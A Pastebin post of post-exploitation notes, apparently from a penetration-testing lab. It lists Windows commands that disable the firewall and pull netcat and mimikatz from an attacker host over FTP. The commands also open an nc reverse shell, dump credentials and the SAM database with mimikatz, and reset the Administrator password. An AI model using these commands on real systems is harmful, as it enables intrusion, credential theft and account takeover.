Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ## Post exploitation
- 192.168.66.112
- • Disabled the target firewall:
- • netsh firewall set opmode disable
- • Used the pre-installed Windows FTP client to upload netcat (nc.exe) and mimikatz to .12
- • Then used nc.exe to create a redundant shell indpendent of the exploited process and used mimikatz to dump the credentials for .12
- • Used the following commands (via the reverse shell) to download nc.exe and mimikatz.exe to .12
- echo open 192.168.66.31> ftp_get_nc.txt
- echo USER offsec>> ftp_get_nc.txt
- echo ftp>> ftp_get_nc.txt
- echo bin >> ftp_get_nc.txt
- echo GET nc.exe >> ftp_get_nc.txt
- echo bye >> ftp_get_nc.txt
- ftp -v -n -s:ftp_get_nc.txt
- --------------------------------------------------------------------------------
- echo open 192.168.66.31> ftp_get_mimikatz.txt
- echo USER offsec>> ftp_get_mimikatz.txt
- echo ftp>> ftp_get_mimikatz.txt
- echo bin >> ftp_get_mimikatz.txt
- echo GET mimikatz.exe >> ftp_get_mimikatz.txt
- echo bye >> ftp_get_mimikatz.txt
- ftp -v -n -s:ftp_get_mimikatz.txt
- • Used the following commands to spawn a shell which was independent of the exploited process
- start cmd /c nc.exe -nv 192.168.66.31 413 -e cmd.exe
- • Used the following mimikatz commands to dump user credentials, elevate privileges, and dump the SAM database (in that order)
- • privilege::debug
- • sekurlsa::logonpasswords
- • token::elevate
- • lsadump::sam
- • Used following command to change password of the Administrator account:
- • lsadump::changentlm /user:Administrator /old:31d6cfe0d16ae931b73c59d7e0c089c0 /newpassword:Administrator
Add Comment
Please, Sign In to add comment